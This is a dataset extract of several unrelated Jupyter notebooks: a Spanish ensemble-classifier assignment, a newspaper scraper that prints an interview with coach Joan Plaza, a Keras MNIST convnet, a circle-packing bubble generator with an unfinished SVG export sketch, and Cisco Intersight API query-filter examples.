path
stringlengths 7
265
| concatenated_notebook
stringlengths 46
17M
|
---|---|
TP2/08 - Voting.ipynb | ###Markdown
Trabajo Práctico 2: Análisis con Voting - Organización de Datos **Alumnos y Padrón** * Grassano, Bruno - 103855 * Romero, Adrián - 103371https://github.com/brunograssano/TP-Organizacion-de-datos Importamos las bibiliotecas
###Code
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve
from sklearn.model_selection import KFold, StratifiedKFold
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC
from sklearn.ensemble import RandomForestClassifier, VotingClassifier
from sklearn import tree
from preprocessing import prepararSetDeDatos
from preprocessing import prepararSetDeHoldout
from preprocessing import prepararSetDeValidacion
from preprocessing import conversionAVariablesNormalizadas
from preprocessing import expansionDelDataset
from funcionesAuxiliares import mostrarAUCScore
from funcionesAuxiliares import mostrarROCCurve
from funcionesAuxiliares import mostrarMatrizDeConfusion
from funcionesAuxiliares import escribirPrediccionesAArchivo
from funcionesAuxiliares import obtenerDatasets
from funcionesAuxiliares import obtenerHoldout
###Output
_____no_output_____
###Markdown
Importamos los datos y los procesamos
###Code
X,y = obtenerDatasets()
X = prepararSetDeDatos(X)
y = prepararSetDeValidacion(y)
###Output
_____no_output_____
###Markdown
Voting Este modelo es un ensamble que consiste en la unión de varios modelos, los cuales votaran de que clase es una instancia. En este caso, decidimos armar el ensamble utilizando los modelos que mejores resultados (segun la metrica AUC-ROC) nos dieron en los otros notebooks.Los elegidos fueron: * Árbol de decisión * SVM * Random Forest * Regresion logísticaCada uno de estos modelos lo recreamos con los mejores hiperparámetros que se encontraron en su notebook.Para el preprocesamiento probamos primero con el basico, el cual incluye a todas las columnas que vienen en el dataframe.
###Code
X_voting = conversionAVariablesNormalizadas(X)
###Output
_____no_output_____
###Markdown
Dividimos el set de datos en sets de training y test.
###Code
X_train, X_test, y_train, y_test = train_test_split(X_voting, y, test_size=0.25, random_state=0)
###Output
_____no_output_____
###Markdown
Inicializamos los modelos que usara Voting, cada uno con sus mejores hiperparametros encontrados. En el caso de random forest se les redujo algo la profundidad.
###Code
regresion_logistica = LogisticRegression(penalty = 'none', solver = "saga",max_iter = 5000)
random_forest = RandomForestClassifier(n_estimators=100, random_state=0,criterion='entropy',max_depth=7)
svm = SVC(C=200, kernel='rbf', gamma=0.1,probability=True)
arbol = tree.DecisionTreeClassifier(random_state=117, max_depth=4, criterion = 'gini')
###Output
_____no_output_____
###Markdown
Creamos el modelo y lo entrenamos.
###Code
voting = VotingClassifier(estimators=[('lr', regresion_logistica), ('rf', random_forest),('svm',svm),('tree',arbol)], voting='soft')
voting.fit(X_train, y_train)
###Output
_____no_output_____
###Markdown
Evaluación de métricas Ahora si, realizamos las predicciones y observamos las métricas.
###Code
y_pred = voting.predict(X_test)
print(classification_report(y_test, y_pred, target_names=['No vuelve','Vuelve']))
mostrarMatrizDeConfusion(y_pred,y_test)
mostrarROCCurve(voting,"Voting",X_test,X_train,y_test,y_train)
mostrarAUCScore(voting,"Voting",X_test,y_test)
###Output
_____no_output_____
###Markdown
Observamos que obtuvimos una mejora en comparación a los otros modelos en varias de las métricas, por no decir todas. Con otro preprocesamiento Vemos ahora si podemos mejorar este resultado utilizando el Dataframe expandido.
###Code
X = expansionDelDataset(X)
X.head()
columnas_codificables_extra = ['pago_categorizado','edades_estratificadas','categoria_invitados']
columnas_numericas_extra = ['2_clusters','4_clusters','10_clusters','cantidad_total_invitados','total_pagado']
X_voting_exp = conversionAVariablesNormalizadas(X,columnas_codificables_extra,columnas_numericas_extra)
X_train, X_test, y_train, y_test = train_test_split(X_voting_exp, y, test_size=0.25, random_state=0)
voting_exp = VotingClassifier(estimators=[('lr', regresion_logistica), ('rf', random_forest),('svm',svm),('tree',arbol)], voting='soft')
voting_exp.fit(X_train, y_train)
###Output
_____no_output_____
###Markdown
Evaluamos
###Code
y_pred = voting_exp.predict(X_test)
print(classification_report(y_test, y_pred, target_names=['No vuelve','Vuelve']))
mostrarROCCurve(voting_exp,"Voting",X_test,X_train,y_test,y_train)
mostrarAUCScore(voting_exp,"Voting",X_test,y_test)
###Output
_____no_output_____
###Markdown
Vemos que empeoro probando con toda la informacion nueva. Otro preprocesamiento mas Vemos si cambia algo sacar algunas columnas. Sacamos la del resultado con 10 clusters y la de la cantidad total de invitados.
###Code
columnas_codificables_extra = ['pago_categorizado','edades_estratificadas','categoria_invitados']
columnas_numericas_extra = ['2_clusters','4_clusters','total_pagado']
X_voting_exp2 = conversionAVariablesNormalizadas(X,columnas_codificables_extra,columnas_numericas_extra)
X_train, X_test, y_train, y_test = train_test_split(X_voting_exp2, y, test_size=0.25, random_state=0)
voting_exp2 = VotingClassifier(estimators=[('lr', regresion_logistica), ('rf', random_forest),('svm',svm),('tree',arbol)], voting='soft')
voting_exp2.fit(X_train, y_train)
###Output
_____no_output_____
###Markdown
Evaluamos este preprocesamiento
###Code
y_pred = voting_exp2.predict(X_test)
print(classification_report(y_test, y_pred, target_names=['No vuelve','Vuelve']))
mostrarROCCurve(voting_exp2,"Voting",X_test,X_train,y_test,y_train)
mostrarAUCScore(voting_exp2,"Voting",X_test,y_test)
###Output
_____no_output_____
###Markdown
Mejoro bastante respecto al anterior, pero no llego a superar la metrica del primero. Predicciones sobre el nuevo archivo Realizamos ahora las predicciones del nuevo archivo entregado.
###Code
holdout = obtenerHoldout()
ids_usuarios = np.array(holdout['id_usuario'])
holdout = prepararSetDeHoldout(holdout)
holdout_voting = conversionAVariablesNormalizadas(holdout)
###Output
_____no_output_____
###Markdown
Realizamos las predicciones y escribimos al archivo CSV.
###Code
predicciones_holdout = voting.predict(holdout_voting)
escribirPrediccionesAArchivo(predicciones_holdout,"Voting",ids_usuarios)
###Output
_____no_output_____ |
scrape_mondo_doc_sp.ipynb | ###Markdown
200, 1100, 2300, 4100, 6800, 8000, 8700, 10700, 14900 convert
###Code
doc_list = os.listdir("./data/mondo_scraped/contents_sp/")
articles = dict()
for file in doc_list:
if file[-4:] == 'json':
with open(os.path.join("./data/mondo_scraped/contents_sp/", file), "r") as f:
articles.update(json.load(f))
len(articles)
clean = {k: v for k, v in articles.items() if v is not None}
len(clean)
docs = pd.DataFrame.from_dict(clean, orient='index')
valids = docs.loc[docs['keyfacts'].astype(np.bool), :]
valids.shape
valids.head()
valids.to_pickle('./data/elmondo_es_sp.pkl')
valids.iloc[7, :].apply(print);
###Output
'Trabajé en el patio de la prisión de Lleida con el Vaquilla, tras 14 años en una cárcel lo relativizas todo'
[' EL MUNDO prepara la Copa del Rey con el entrenador anfitrión en el mítico Pimpi Florida ', ' "Si la Liga no es más seria se nos irá de las manos" ', ' "El Real Madrid tiene la confianza para llegar a cotas que ni ellos mismo esperan" ', ' "Barcelona, como otras veces Madrid, Unicaja o Laboral Kutxa, está rehaciendo lo andado" ', ' "O mejoramos todos la calidad del producto o será difícil que esto no se convierta en una Liga menor" ', " Un 'beatle' en el templo de la Copa "]
En las paredes, plantillas añejas del Unicaja, entre fotos de folclóricas, Garbajosa con el fisio de los Toronto Raptors o guiños de la selección a un taberna que huele a mar, vino, copla, Beatles y baloncesto. Joan Plaza se encontró con un santuario: El Pimpi Florida.
Pregunta.-Le hemos traído aquí y confiesa que no bebe...
Respuesta.-Nunca había bebido whisky hasta que me nombran entrenador del Madrid, me decían que tomara whisky porque no da resaca y lo hice, pero nunca me he tomado dos. No recuerdo estar borracho.
P.- Pues ganó títulos como para emborracharse alguna vez...
R.- Gané la Liga, estaba allí en medio de todo el mundo medio tirado, me puse en la piel del otro entrenador y casi me disculpé por haber ganado: lo siento. Cuando gané la Uleb, si hubiese podido desaparecer, lo hubiese hecho. Me fui a Trifunovic, y le dije: "la próxima vez ganarás tú". Acabé y me escondí, en aquel momento sólo pensaba en todos los que no habían estado: hay gente que no tienen nombres comerciales y también podrían estar aquí y haber ganado esto. Pensaba: 'pero déjate llevar'. Sentía una felicidad brutal, pero la apartaba.
P.-¿Heredó esa coraza de su época como funcionario de prisiones?
R.-Si has pasado 14 años en una prisión, lo relativizas todo. Cuando se pierden varios partidos seguidos aquí, en Madrid o Sevilla se dramatiza todo. Sacas conclusiones pero no te pones en la piel del jugador, periodista o directivo que se pone a la defensiva, con mucho miedo.
P.-¿Algún momento movido en sus guardias nocturnas?
R.-Tuve un motín bonito. Mi segunda noche en la prisión de Lleida, teníamos que quedarnos un funcionario de Granada y yo a pasar la noche con 300 internos. Esto pasa en todas las prisiones, por la noche hay menos gente. Tenía que revisar cada celda por la mirilla, que estuviesen todos dentro, los presos te saludaban [hace la peseta], oí un follón y me dijeron que subiese, que alguien se había salido de la celda. Uno de los que había estado en la fuga del Vaquilla retaba a todos para que entraran en su galería. El jefe dijo que entráramos: le abrió la cara de lado a lado con un barrote de la litera. No entraré en detalles, fue curioso. Llegué a casa manchado de sangre y dije: nunca más, no vuelvo. Aquella noche fue mucho más larga de lo que he dicho, hubo cortes de venas, barrigas...Trabajé en el patio de la prisión de Lleida con el Vaquilla. Tres años en la prisión de jóvenes y diez en la otra.
El entrenador del Unicaja Joan Plaza en el Pimpi Florida, Málaga.
CARLOS DÍAZ
"A la gente le gustaría ir más rápido con la progresión del Unicaja pero sería como cocer y freír todo lo que hay aquí muy rápido...no sirve".
P.- Bueno, esa experiencia le serviría en según qué banquillos de la NBA...
R.- La tipología de entrenador allí, excepto Popovic en San Antonio y alguno más, son ex jugadores que toleran que el jugador, profesional de por sí, trabaje en el partido y no tanto en el entrenamiento,que tenga una vida mucho más distinta al concepto que tenemos más en Europa. Ojalá se dé esa circunstancia. Siempre he dicho que es verdad que me gustaría entrenar equipos grandes, llevar la Selección Española, la NBA, pero también he dicho muchas veces que si eso no ocurre pero eso tira de ti para que cada día seas mejor, pues bienvenido. Es mi zanahoria, puede ser que nunca pase nada, pero estoy contento de los proyectos que tengo. Me halaga que la gente piense que eres capaz de revertir una situación complicada en algunos clubes. Me gusta volver a Madrid, como volví a Sevilla, y que haya personas de pie aplaudiéndote. Eso es que algo bueno has hecho, y de momento pasa en todos los sitios donde estuve. Hay mucha gente que ha ayudado a que eso sea así y estoy muy orgulloso.
.P- ¿Qué tal en Málaga?, ¿Qué le parece la ciudad?
R.- Percibo que la sociedad malagueña es más cosmopolita de lo que esperaba. Gente más tolerante, aunque no sea tan monumental como Sevilla, donde fui muy feliz, es cierto que hay un riqueza que no es constatable, no es física. Veo a gente con mucha más capacidad de creación, el movimiento que me explican del mundo de la música, el cine que se mueve entre bambalinas, lugares tan peculiares como éste... Se acerca más a la idea de ciudad de Barcelona de lo que yo esperaba. La gente es mucho más abierta y es un lugar donde poder saca muchos recursos literarios, hay margen y gente peculiar como para que puedan salir reflejadas en tus novelas.
P.-¿Así que incentiva esa faceta suya de escritor?
R.- No puedo considerarme escritor si juzgo que una persona está preparada para ello como yo lo estoy para entrenar. Un día empecé a escribir estando en prisión una novela que se ha publicado en tres idiomas distintos, que está agotada, los 300 únicos ejemplares que hay en castellano. Está a punto de llegar aquí, pero me sorprende que se haya vendido o que me llegue gente hablando de ello. En Estambul [en el hotel del Unicaja en Euroliga] se presentó un argentino a hablar del libro y me parece algo espectacular porque son anotaciones al viento, son anotaciones en forma novelada que han despertado la inquietud en un tipo de gente y que sólo pretenden estimular que la gente pelee por sus sueños. Mi novela no tiene más sentido que este. Me gusta que sea un libro de cabecera para mucha gente, en Lituania, la última semana antes de irme hicimos una firma de libros y se presentó una persona con 50 notas de distintos colores en distintas hojas con sus reflexiones personales. Me parece increíble porque yo no tengo la formación para ser escritor, pero se han vendido todas las que he escrito, la segunda novela espero que salga este mismo año. Siempre dejo guiños a los lugares en los que he vivido, sería muy buena señal que estuviese aquí el tiempo suficiente y no me echaran antes de tiempo como para que dejara reflejado en mis novelas mi paso por Málaga, por el Pimpi Florida y otros muchos lugares.
P.- ¿Cómo llega su equipo a la Copa?
R.-Sólo nos planteamos mejorar los números de los años anteriores, eso no oculta que seamos ambiciosos. A la gente le gustaría ir más rápido pero sería como cocer y freír todo lo que hay aquí muy rápido...no sirve. Para que perdure en años y que no sea sólo una temporada, hay que hacerlo de una forma lenta y dura. Contento, el equipo va a más.
P.- Pero le está costando reconciliar a la afición con el equipo a pesar de que la temporada no es mala, ¿Le hace falta una gran gesta?
R.-Es probable que esa sea una de las recetas. Más allá de la seriedad de este proyecto o que ahora haya mejores números que el año pasado con menos presupuesto, sería un gran subidón una buena Copa del Rey, no sólo ganándola, que sería mucho, pero compitiendo hasta la final. Hacer unos 'play-offs' duros, serios. Hemos de recuperar a toda la gente que ha salido de este proyecto y ahora lo vive colateralmente para que vuelvan dentro de la dinámica del equipo. Una Copa del Rey nos ayudaría a estar arriba.
P.- ¿Se quedará con Domantas Sabonis?
R.- El club demandaba, y yo entendía que era cierto, que tiene una gran cantera detrás que o se apuesta o no por ella. Los juniors ha sido subcampeones en el torneo de Hospitalet, los infantiles han ganado su torneo. El equipo LEB está en buena tesitura y no podemos jugar a dos barajas: o jugamos la de no cantera y nos olvidamos del tema o la jugamos, pero en ese caso hay que hacerlo en serio. Tenemos un jugador con un potencial como el de Sabonis, Todorovic, Maodo...Son jugadores con potencial de ser muy importantes en uno o dos años. Si tenemos la suerte de que Sabonis siga el año que viene, que es la gran duda, la inversión de este año la recogeremos el año que viene o el siguiente.
P.- Pero el hombre a convencer es Sabonis, Arvydas; padre de la criatura...
R.- Sí, se debe encontrar en una situación complicada porque quiere que el chico siga estudiando. Domantas es un buen estudiante, tiene la opción de poder ir a universidades americanas y tiene que decidir ya no en verano, sino antes, porque de lo contrario esta apuesta quedará como un brindis al sol y no servirá para nada. Habría que replantearlo y quizás pensar en otro jugador que ocupara esa plaza. Pero ahora los jugadores que están en el junior, el LEB y el cadete ven que el primer equipo no está tan lejos, que no es tan difícil. Nos gustaría tener jugadores malagueños o criados en la cantera de una forma más regular como hubo hace unos años, pero eso requiere un tiempo, un proceso. No he hablado con él del tema, vendrá a la Copa del Rey; hablé con él en Lituania pero no de ese tema.
P.-¿Cómo ve al Real Madrid?
R.-Tienen una confianza que les puede hacer estar cerca de completar la temporada perfecta. No fallar ni una, están cerca de esa capacidad no sólo porque técnicamente son muy buenos y tienen una plantilla muy compensada, sino porque tienen un nivel de autoconfianza brutal y eso les puede llevar a cotas que ni ellos mismo esperaban.
P.-¿Y qué le pasa al Barcelona?
El entrenador del Unicaja Joan Plaza posa tras la barra del Pimpi Florida, Málaga.
CARLOS DÍAZ
"Sabonis tiene la opción ir a universidades americanas y tiene que decidir antes de verano, porque de lo contrario esta apuesta será un brindis al sol, no servirá para nada".
R.- Lo que a veces le ha pasado a otros grandes como el Real Madrid, que la reconversión no se ha hecho a tiempo y cuando la vas a hacer tienes que cambiar muchas piezas. Hay proyectos que se erosionan con el tiempo y es muy difícil mantener el status quo que has tenido durante varios años. El secreto del deporte profesional es reconocer el momento en el que estás perdiendo facultades y no atrincherarte sino empezar a cambiar. Barcelona, como otras veces Madrid, Baskonia y Unicaja, está rehaciendo lo andado.
P.-¿Debió prever el cambio?
R.-Sí, o Baskonia que muchos años ha estado por encima de sus posibilidades: vendían y se mantenían arriba. Este año por fin demostraron que son humanos y necesitarán un tiempo para estar arriba.
P.-Y la ACB, ¿necesita cambiar?
R.- Está en un punto no tanto crítico como de reinventarse otra vez. Hay que anticiparse al problema que viene, no sólo que la gente sufre para llenar los pabellones, sino que hay una Euroliga que crece exponencialmente, los sponsors se giran a la liga más fuerte. O damos un paso adelante y hacemos una liga más seria, competitiva y organizada o se nos escapará de las manos.
P.- Aunque ganó varios títulos, vivió el año pasado lo que viven algunos en la ACB esta campaña: trabajar sin cobrar, ¿Qué le parece?
R.- Cobré hasta enero aunque el banco se declaró en bancarrota y deben dinero de la primera parte del año, la segunda parte la cobraré en tres o cuatro años. También es difícil encontrar a un entrenador que en su carrera le hayan pagado puntual siempre. Tuve que vivir esa experiencia y decidir si dejarlo todo y venir a España o seguir hasta el final. Decidí quedarme, ganamos la Liga y ha sido beneficioso para mí y para los que estuvieran a mi lado. Me preocupa mucho que haya jugadores y entrenadores que estén por debajo del mínimo interprofesional que está estipulado por la propia ACB. Todos lo sabemos y nos cuesta no arreglarnos. A lo mejor hemos de ir a una Liga un poco más corta, donde la competitividad sea mayor, donde no hayan tantas diferencias en el marcador pero en el que se pague lo que se pacte al inicio de la temporada. Es importante que hagamos un baloncesto atractivo, hay más competitividad que antes, el fútbol sigue atrayendo a gran parte de la oferta que hay. O mejoramos todos la calidad del producto o será difícil que esto no se convierta en una Liga menor.
P.-Catalán y ex del Real Madrid, ¿qué le parece la consulta?
R.-Una de las cosas buenas que podemos hacer en esta vida es coger una maleta e irte. Cuando me fui de Barcelona a Madrid me sorprendió que la realidad que se explicaba en Madrid era muy distinta a la que vivía en Barcelona. ¿Cual era cierta? Ninguna de las dos, no es cierto lo que decían los medios catalanes ni lo que explicaban en Madrid. Hablaba con gente en Madrid porque la idea que se explicaba era equivocada, y les decía que no me hicieran caso: llamemos a Aíto García Reneses que es madrileño, vive en Cataluña desde hace muchos años y que él os dé la perspectiva. Pero escuchad a la gente que vive allí, no os guiéis por lo que veis por televisión porque se vende una crispación que no existe como tal, pero es a la que mucha gente saca partido.
P.- ¿Perdió amigos por el asunto?
R.- No, pero me he dado cuenta de que mucha gente no es capaz de ponerse en tu piel. Fui entrenador del Real Madrid y estoy orgullosísimo de haberlo sido, tengo amistades allí que no quiero perder nunca en mi vida. Pero hay mucha gente muy radical a la que le cuesta entender que quien te ha dado la primera oportunidad de primer nivel mundial es el Real Madrid, y yo soy catalán. Soy el primer catalán de la historia que entrena al Madrid de baloncesto y probablemente al de fútbol. Estoy orgulloso de haberlo vivido, he aprendido un montón, soy más capaz, más listo, pero también le pasará lo mismo a Aíto que ha estado en Barcelona durante 40 años. Las fronteras que nos montamos a veces son bastante ingenuas.
P.- Metidos en harina, y con sus antecedentes habrá que preguntarle por la 'doctrina Parot'...
R.- Hay que estar en la piel del otro, tener un gran nivel de empatía. Cuando alguien sufre en sus carnes lo que sufre una de estas personas que luego se ha podido acoger a la doctrina Parot es normal que estén molestas o dolidas, pero entendiendo ese dolor, lo que está claro es que hay una ley que hay que mejorar. La ley, no sólo la penitenciaria, también la ley general en este aspecto. Hay que mejorar y ceñirnos todos a la misma, nos guste o no. Hay que encontrar la manera en la que podemos mejorarla si creemos que es posible. En la vida, estoy enfermo de esto, hay que ser empáticos, hay que saber por qué se protesta, por qué se acomodan, por qué no lo hacen...
P.- Bueno, Joan, antes de la Copa, ¿Por qué brinda?
R.- Porque tenemos el tren sobre las vías y estamos en condiciones. No esperábamos la posición en Liga, el equipo desprende cosas importantes y estamos recolectando gente que estaba desengañada. Pidamos más carbón para la caldera. Ser cabezas de serie es un gran empuje,pero creo en las cosas progresivas, no en las varitas mágicas. El Madrid es el claro favorito, si sigue con esta autoridad será difícil rebatírselo y habrá que competir en nuestra liga que es más abajo.
[]
2014-02-03
|
notebook/mnist_cnn.ipynb | ###Markdown
Trains a simple convnet on the MNIST dataset.
###Code
'''Trains a simple convnet on the MNIST dataset.
Gets to 99.25% test accuracy after 12 epochs
(there is still a lot of margin for parameter tuning).
16 seconds per epoch on a GRID K520 GPU.
'''
from __future__ import print_function
import keras
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras import backend as K
batch_size = 128
num_classes = 10
epochs = 12
# input image dimensions
img_rows, img_cols = 28, 28
# the data, shuffled and split between train and test sets
(x_train, y_train), (x_test, y_test) = mnist.load_data()
if K.image_data_format() == 'channels_first':
x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)
x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)
input_shape = (1, img_rows, img_cols)
else:
x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)
x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)
input_shape = (img_rows, img_cols, 1)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
# convert class vectors to binary class matrices
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
model = Sequential()
model.add(Conv2D(32, kernel_size=(3, 3),
activation='relu',
input_shape=input_shape))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
validation_data=(x_test, y_test))
score = model.evaluate(x_test, y_test, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
###Output
Using TensorFlow backend.
|
Example Notebooks/Bubble Generator.ipynb | ###Markdown
Step 1: Generate a random convex hull
###Code
from koebe.algorithms.incrementalConvexHull import randomConvexHullE3WithHighDegreeVertex
mesh = randomConvexHullE3WithHighDegreeVertex(100, 20)
mesh.outerFace = mesh.verts[-1].remove()
# Run this block if you want to see the mesh
from koebe.graphics.spherical2viewer import *
viewer = S2Viewer(600,600)
viewer.toggleSphere() # Hide the sphere
viewer.addAll(mesh.edges)
viewer.show()
###Output
_____no_output_____
###Markdown
Step 2: Circle pack the convex hull
###Code
from koebe.geometries.euclidean2 import PointE2
from koebe.algorithms.hypPacker import *
def orthProj(p):
return PointE2(p.x, p.y)
dists = [(orthProj(v.data) - PointE2.O).normSq() for v in mesh.verts]
closestToOriginIdx = dists.index(min(dists))
packing, _ = maximalPacking(
mesh,
num_passes=1000,
centerDartIdx = mesh.darts.index(mesh.verts[closestToOriginIdx].aDart)
)
# Run this to view the circle packing
from koebe.graphics.euclidean2viewer import PoincareDiskViewer, makeStyle
viewer = PoincareDiskViewer(600, 600)
viewer.addAll(packing.verts)
#d = DiskOP2(1,0,0,-1)
#viewer.add(d)
#viewer.setStyle(d, makeStyle(fill='#00ff00'))
viewer.show()
from koebe.algorithms.inversiveVoronoi import inversiveVoronoi as IV
from koebe.geometries.orientedProjective2 import DiskOP2
sgPacking = packing.duplicate(
vdata_transform = lambda vData : DiskOP2.fromCircleE2(vData.toPoincareCircleE2()).toDiskS2()
)
# Run this block if you want to see the mesh
from koebe.graphics.spherical2viewer import *
viewer = S2Viewer(600,600)
viewer.toggleSphere() # Hide the sphere
viewer.addAll(sgPacking.verts)
blueStyle = makeStyle(stroke="#00f", strokeWeight=1, fill="rgba(255, 255, 255, 0.5)")
for v in sgPacking.verts:
viewer.setStyle(v, blueStyle)
viewer.show()
arcs = IV(sgPacking)
arcs2D = [arc.sgToCircleArcOP2() for arc in arcs]
disks2D = [v.data.sgProjectToOP2() for v in sgPacking.verts]
# Get toSVG method implemented here.
arcs2D[0]
# Something along these lines
print "Writing SVG file..."
svgStr = toSVG(512.0)
f = open(svgFilePath, 'w')
f.write(svgSztr)
f.close()
print "Done."
###Output
_____no_output_____ |
resources/ucs/intersight/intersight.ipynb | ###Markdown
Intersight REST API Query Parameter Usage ExamplesIntersite supports the use of a query language in the URI of a REST API request, as query parameters. This Notebook includes examples of using the Intersight query language to **filter results returned to the REST client, on the server/Intersight side**. This process can simplify the effort to filter results on the client side.- Filter options include: - `eq`, `ne`, `gt`, `lt`, `ge`, `le` - `$filter=NumCpus ge 4` - `and`, `or`, `not` - `($filter=NumCpus ge 4 and NumCpus le 8)` - `in` - `($filter=Model in ('HX220C-M5SX', 'UCSC-C240-M5SN')` - `contains` - `($filter=contains(Model, B200))` - `startswith` - `($filter=startswith(Model, UCSC))` - `endswith` - `($filter=endswith(Model, M5))` - `tolower`/`toupper` - `($filter=contains(Model, toupper(b200)))`Reference: [Intersight Query Syntax](https://intersight.com/apidocs/introduction/query/ "Intersight Query Syntax") --- Import the `intersight_helper` functions Intersight API Authentication Setup**IMPORTANT**Be sure to follow the instructions [**here**](https://wwt.github.io/dcauto-study-resources/sections/section_4/hands-on-learning ) before you attempt to run the next and subsequent cells in this notebook.
###Code
# Setup exception handling for the Intersight authentication process
try:
# Attempt to import the functions in the `intersight_`helper` module - this import attempts Intersight authentication.
from intersight_helper import *
from requests import HTTPError
# Handle missing keyId.txt and keySecret.txt files
except FileNotFoundError as e:
print('Unable to locate authentication key and signature file combination.')
print(f'{e!r}')
print(f'{e.filename!r}')
###Output
_____no_output_____
###Markdown
Test to determine if authentication and authorization are successful.
###Code
# Determine if the keyId.txt and keySecret.txt files successfully authenticate
try:
results = intersight(
method='GET',
endpoint='/compute/Blades'
)
except HTTPError as e:
print('The Intersight authentication process failed.\n'
'Please be sure to follow the "Intersight API Authentication Setup" directions above before continuing.')
# The Intersight API authentication and authorization process is successful if you see `200 OK` below
###Output
HTTP response: 200 OK
Objects returned: 18
###Markdown
--- Create a helper function to display query results.
###Code
from typing import Dict, List
def display_results(
results: Dict,
fields: List = None
) -> None:
""" Helper function to display query results.
Args:
results (Dict):
Dictionary of results returned by the Intersight
API call.
fields (List, optional):
Optional List of dictionary fields to display.
'Dn' is automatically included.
Returns:
None.
"""
# Alias results['Results']
results = results.get('Results', list())
# Check count of results
if len(results) == 0:
print('No results found.')
return
for index, result in enumerate(results):
# Display current and total results count
print(f'{index + 1} of {len(results)}')
# Display the 'Dn' for each result
print(f'DN: {result.get("Dn", "N/A")}')
# Display any optional fields
if fields is not None:
for field in fields:
print(f'\t{field}: {result.get(field, "N/A")}')
print()
###Output
_____no_output_____
###Markdown
--- Examples Filter for specific resources, using matching criteria
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$filter=NumCpus ge 4'
)
# Display the results
display_results(
results=results,
fields=[
'Model',
'NumCpus'
]
)
###Output
HTTP response: 200 OK
Objects returned: 2
1 of 2
DN: sys/chassis-5/blade-3
Model: UCSB-B480-M5
NumCpus: 4
2 of 2
DN: sys/chassis-5/blade-3
Model: UCSB-B480-M5
NumCpus: 4
###Markdown
--- Return/select only certain matching properties
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$select=Model,Dn,Serial'
)
# Display the results
display_results(
results=results,
fields=[
'Model',
'Serial'
]
)
###Output
HTTP response: 200 OK
Objects returned: 18
1 of 18
DN: sys/chassis-5/blade-1
Model: UCSB-B200-M5
Serial: SRV122
2 of 18
DN: sys/chassis-5/blade-3
Model: UCSB-B480-M5
Serial: SRV125
3 of 18
DN: sys/chassis-3/blade-1
Model: UCSB-EX-M4-1
Serial: SRV107
4 of 18
DN: sys/chassis-3/blade-3
Model: UCSB-EX-M4-1
Serial: SRV108
5 of 18
DN: sys/chassis-3/blade-7
Model: UCSB-EX-M4-1
Serial: SRV110
6 of 18
DN: sys/chassis-4/blade-1
Model: UCSC-C3K-M4SRB
Serial: SRV111
7 of 18
DN: sys/chassis-4/blade-2
Model: UCSC-C3K-M4SRB
Serial: SRV112
8 of 18
DN: sys/chassis-3/blade-5
Model: UCSB-EX-M4-1
Serial: SRV126
9 of 18
DN: sys/chassis-5/blade-2
Model: UCSB-B200-M5
Serial: SRV124
10 of 18
DN: sys/chassis-3/blade-1
Model: UCSB-EX-M4-1
Serial: SRV107
11 of 18
DN: sys/chassis-3/blade-5
Model: UCSB-EX-M4-1
Serial: SRV126
12 of 18
DN: sys/chassis-4/blade-2
Model: UCSC-C3K-M4SRB
Serial: SRV112
13 of 18
DN: sys/chassis-5/blade-3
Model: UCSB-B480-M5
Serial: SRV125
14 of 18
DN: sys/chassis-3/blade-3
Model: UCSB-EX-M4-1
Serial: SRV108
15 of 18
DN: sys/chassis-3/blade-7
Model: UCSB-EX-M4-1
Serial: SRV110
16 of 18
DN: sys/chassis-4/blade-1
Model: UCSC-C3K-M4SRB
Serial: SRV111
17 of 18
DN: sys/chassis-5/blade-1
Model: UCSB-B200-M5
Serial: SRV122
18 of 18
DN: sys/chassis-5/blade-2
Model: UCSB-B200-M5
Serial: SRV124
###Markdown
--- Pagination, return the top N results only
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$top=3'
)
# Display the results
display_results(
results=results,
fields=[
'Model',
'Serial',
'NumThreads'
]
)
###Output
HTTP response: 200 OK
Objects returned: 3
1 of 3
DN: sys/chassis-5/blade-1
Model: UCSB-B200-M5
Serial: SRV122
NumThreads: 16
2 of 3
DN: sys/chassis-5/blade-3
Model: UCSB-B480-M5
Serial: SRV125
NumThreads: 32
3 of 3
DN: sys/chassis-3/blade-1
Model: UCSB-EX-M4-1
Serial: SRV107
NumThreads: 16
###Markdown
--- Pagination, skip the top N results only
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$skip=3'
)
# Display the results
display_results(
results=results,
fields=[
'Model',
'Serial',
'NumThreads'
]
)
###Output
HTTP response: 200 OK
Objects returned: 15
1 of 15
DN: sys/chassis-3/blade-3
Model: UCSB-EX-M4-1
Serial: SRV108
NumThreads: 16
2 of 15
DN: sys/chassis-3/blade-7
Model: UCSB-EX-M4-1
Serial: SRV110
NumThreads: 16
3 of 15
DN: sys/chassis-4/blade-1
Model: UCSC-C3K-M4SRB
Serial: SRV111
NumThreads: 16
4 of 15
DN: sys/chassis-4/blade-2
Model: UCSC-C3K-M4SRB
Serial: SRV112
NumThreads: 16
5 of 15
DN: sys/chassis-3/blade-5
Model: UCSB-EX-M4-1
Serial: SRV126
NumThreads: 16
6 of 15
DN: sys/chassis-5/blade-2
Model: UCSB-B200-M5
